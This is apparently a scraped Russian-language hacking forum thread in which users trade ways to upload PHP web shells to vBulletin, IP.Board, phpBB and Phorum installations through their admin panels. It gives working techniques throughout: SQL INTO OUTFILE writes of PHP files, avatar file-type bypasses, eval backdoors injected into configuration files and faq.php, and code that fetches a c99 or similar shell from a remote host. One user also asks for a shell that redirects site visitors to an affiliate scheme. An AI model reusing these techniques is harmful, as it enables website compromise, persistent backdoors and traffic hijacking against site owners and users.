|
Как залить шелл в vBulletin 3.8.1? Линки в первом посту нерабочие.
|
Код:
1. Заходим в админку.льем шелл, возвращаемся в админку, удаляем модуль faq_complete |
в булке 3.5.1 у меня нет прав на модули и редактирование прав. ПОдскажите можно ли канибудь через стили залить или другое.
|
Цитата:
|
Как можно загрузить шелл на IPB 3? Имеется доступ в админку. Способы IPB 2 к несчастью использовать не получается.
|
Цитата:
|
Цитата:
вариант1: Поддержка->Управление SQL->Выполняющиеся процессы->Выполнить новый запрос select 0x3c3f706870696e666f28293b3f3e into outfile 'Z:/home/site.ru/www/uploads/shell.php' полный путь можно посмотреть так: ->Поддержка, там будет сверху написана версия PHP и слева ссылка на PHP INFO Тестилось на IBP 3.0.1 nulled шелл: http://site.ru/uploads/shell.php PS: Нужны соответствующие права вариант2: Форумы->Прикрепляемые файлы->Типы файлов жмем "Добавить новый тип"->"Использовать какой-нибудь тип как базовый?" - выбираем "Основан на типе php"->"Расширение прикрепляемого файла" - php3 (просто php есть в списке по умолчанию и при загрузке автоматически переименовывается в .txt)->"MIME-тип файла" - image/gif->"Разрешить использовать этот тип файлов, как аватар или фотографию?" - да. Топаем в свой профиль: http://site.ru/index.php?app=core&module=usercp&tab=members&area= avatar грузим аву-шелл с расширением php3 и получаем шелл по адресу: http://site.ru/uploads/av-1.php3 |
Просто возьми готовый шел: http://autospanner.ru/menu/groovie.rar
|
|
Есть IP.Board 2.3.6 , через шаблоны шелл залить не получается так как закрыты все папки для записи. Есть также все админы в том числе и самый первый. раньше с помощью него в настройках исполнял команду
$data=implode('',file('http://ssilka/do/shella/c99.txt')); $fp=fopen('./shell.php','wb'); fputs($fp,$data); fclose($fp); Нормально было шел заливался. Но сейчас так не делается и шела нету. В чем может быть проблема, как её обойти, и какие ещё могут быть способы? Заранее спс |
есть способы заливки шелла для форума vBulletin 3.8.0 Beta 3 ?!
|
в smf можно сменить директорию в которую заливаются темы ? :(
|
как залить шелл на TorrentPier ??
|
Кто знает еще какие то способы заливки шелла на ipb 2.3.4 ? Через импорт изображения - не проходит - вернее шелл загружен но видимо в директории запрещено выполнение скриптов, вываливается ошибка 500 Internal Server Error, через аватару тоже не проходит - и тип файла добавил и разрешение в аватаре на этот тип добавил, но все равно не загружает.
Заранее спасибо |
такой вопрос, залил шелл на IPB NULL, пытаюсь войти и выдаёт 500 Internal Server Error. В чем может быть проблема? Точнее как залить шелл не через стили
|
Отлично Пашкела в + 4 из 3 в держки по думаю в чем косяк, но все же
|
Версия: phorum-3.4.6
Цитата:
Наткнулся совершенно случайно, версия оч старая, нагуглил архив, скал, стал изучать исходники, и почти сразу наткнулся на то что конфигурация форума сохраняется в PHP файл: Код:
C:\wamp\www\phorum-3.4.6\phorum-3.4.6\admin\settings\forums.phpПоследние строки в конфиг файле: PHP код:
Код:
http://www.SITE.COM/forum/admin/index.php?page=dbКод:
'; @eval(stripslashes($_GET['cmd'])); echo 'Код:
http://www.SITE.COM/forum/admin/settings/forums.php |
пробывал залить шелл способом пашкеллы. phpinfo показывает, но погда уже прописываю /faq.php?e=wget линк на шелл
пишет Код:
Parse error: syntax error, unexpected T_STRING inКод:
eval($_GET[e]); |
Цитата:
а где тут загружать шелл найти не могу. Помогите кто сталкивался |
Цитата:
eval(file_get_contents('http://site.com/shell.txt')); |
Подскажите пожалуйста как залить php шелл на vbulletin 3.xx - 4.xx очень нужно
|
Цитата:
|
Цитата:
|
Не понял вас. всысле залить шелл сразу?
|
Цитата:
|
Ага, если было бы всё так просто. имею доступ только к админке.
|
Цитата:
Цитата:
|
Заливал я на свой хостинг. как написанно в инструкции выше. лан спасибо за помощь. Все уже получилось при помощи, Google and English hack forums
|
ктонить помогите такая хрень вылетает при заливке через шаблон :ipb 2.3.4
"Admin CP Message There was no content in the file to process" типа нету ничё( я так понял ето chmod стоит на ету дерикторию |
Цитата:
1.go to acp 2.click on the Tools & Settings tab 3.then click on General Configuration 4.after that browse down and look for " find Upload URL" ( here write the right url) 5.and then find this "Path to 'upload' directory" and once again write the right path. 6.ok now save the settings and try to upload a skin. p.s if you dont knw the right url for the step 4 and 5, they are written under the description of the title . for example: Upload URL: The URL to your "uploads" folder. |
короче всё получилось скин залился тока теперь ещё один проблемс, Internal Server Error
|
|
Здравствуйте.Подскажите.У меня такая ситуация:Есть приличное кол-во сайтов с sql уязвимостями.Так вот,если можно приведите пример шелла,чтобы после заливки он редиректил сразу пользователей на нужную мне партнёрку.Спасибо заранее.
|
Есть доступ в админку Powered by phpBB 2.0.21 , Восстановление бд не работает, это не работает /showpost.php?p=198446&postcount=3 , есть еще что-то ?
|
vBulletin 4.1.3, админка есть, eval() прикрутил в модулях, пытаюсь лить шелл, а он мне:
Код:
Warning: file_get_contents() [function.file-get-contents]: http:// wrapper is disabled in the server configuration by allow_url_fopen=0 in [path]/faq.php(324) : eval()'d code(1) : eval()'d code on line 1Есть еще какие способы? Может можно какой файл с внедренным шеллом залить штатными методами, а потом строки вырвать уже локально? |
Цитата:
|
DronS,
простой загрузчик внедри в faq.php или сразу код запакованного WSO без |
угу, или же залей новый смайл с кодом шелла и проикнлудь
|
Цитата:
Код:
Warning: file_put_contents(/блаблабла.php) [function.file-put-contents]: failed to open stream: Permission denied in [path]/faq.php(324) : eval()'d code(1) : eval()'d code on line 1Но запрет открытия по урл это не решает. |
Цитата:
|
| Время: 17:49 |